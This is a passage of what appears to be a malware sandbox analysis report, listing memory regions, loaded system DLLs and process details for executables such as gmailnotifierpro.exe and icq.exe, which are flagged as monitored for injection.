= 3159 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3160 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3161 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3162 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3163 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3164 start_va = 0x80000 end_va = 0xfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 3165 start_va = 0x120000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 3166 start_va = 0x1b0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3167 start_va = 0x2c0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 3168 start_va = 0x3c0000 end_va = 0x426fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3169 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3170 start_va = 0x4e0000 end_va = 0x667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 3171 start_va = 0x670000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 3172 start_va = 0x800000 end_va = 0x8defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 3173 start_va = 0x940000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 3174 start_va = 0x980000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 3175 start_va = 0xd30000 end_va = 0xd46fff monitored = 0 entry_point = 0xd314a1 region_type = mapped_file name = "fling.exe" filename = "\\Program Files (x86)\\Windows Sidebar\\fling.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\fling.exe") Region: id = 3176 start_va = 0xd50000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 3177 start_va = 0x2150000 end_va = 0x2b13fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002150000" filename = "" Region: id = 3178 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3179 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3180 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3181 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3182 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3183 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3184 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3185 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3186 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3187 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3188 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3189 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3190 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3191 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3192 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3193 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3194 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3195 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3196 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3197 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3198 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3199 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3200 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3201 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3202 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3203 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3204 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3205 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3206 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3207 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3208 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3209 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Thread: id = 174 os_tid = 0x23c Process: id = "22" image_name = "gmailnotifierpro.exe" filename = "c:\\program files\\windows media player\\gmailnotifierpro.exe" page_root = "0x4c2ea000" os_pid = "0x178" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\Windows Media Player\\gmailnotifierpro.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3211 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3212 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3213 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3214 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3215 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3216 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3217 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3218 start_va = 0x160000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3219 start_va = 0x1f0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3220 start_va = 0x340000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 3221 start_va = 0x390000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 3222 start_va = 0x4b0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 3223 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 3224 start_va = 0x660000 end_va = 0x7e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 3225 start_va = 0x7f0000 end_va = 0x970fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 3226 start_va = 0x980000 end_va = 0xa5efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 3227 start_va = 0xa60000 end_va = 0xb73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 3228 start_va = 0x11f0000 end_va = 0x1206fff monitored = 0 entry_point = 0x11f14a1 region_type = mapped_file name = "gmailnotifierpro.exe" filename = "\\Program Files\\Windows Media Player\\gmailnotifierpro.exe" (normalized: "c:\\program files\\windows media player\\gmailnotifierpro.exe") Region: id = 3229 start_va = 0x1210000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 3230 start_va = 0x2610000 end_va = 0x2fd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002610000" filename = "" Region: id = 3231 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3232 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3233 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3234 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3235 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3236 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3237 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3238 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3239 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3240 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3241 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3242 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3243 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3244 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3245 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3246 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3247 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3248 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3249 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3250 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3251 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3252 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3253 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3254 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3255 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3256 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3257 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3258 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3259 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3260 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3261 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3262 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Thread: id = 175 os_tid = 0x304 Process: id = "23" image_name = "icq.exe" filename = "c:\\program files (x86)\\windows sidebar\\icq.exe" page_root = "0x4cbf0000" os_pid = "0x94" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\icq.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3264 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3265 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3266 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3267 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3268 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3269 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3270 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3271 start_va = 0x140000 end_va = 0x156fff monitored = 0 entry_point = 0x1414a1 region_type = mapped_file name = "icq.exe" filename = "\\Program Files (x86)\\Windows Sidebar\\icq.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\icq.exe") Region: id = 3272 start_va = 0x1d0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3273 start_va = 0x2e0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 3274 start_va = 0x460000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3275 start_va = 0x560000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3276 start_va = 0x660000 end_va = 0x73efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 3277 start_va = 0x7a0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 3278 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 3279 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 3280 start_va = 0x980000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 3281 start_va = 0xb10000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 3282 start_va = 0x1f10000 end_va = 0x28d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f10000" filename = "" Region: id = 3283 start_va = 0x28e0000 end_va = 0x29dafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028e0000" filename = "" Region: id = 3284 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3285 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3286 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3287 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3288 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3289 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3290 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3291 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3292 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3293 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3294 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3295 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3296 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3297 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: 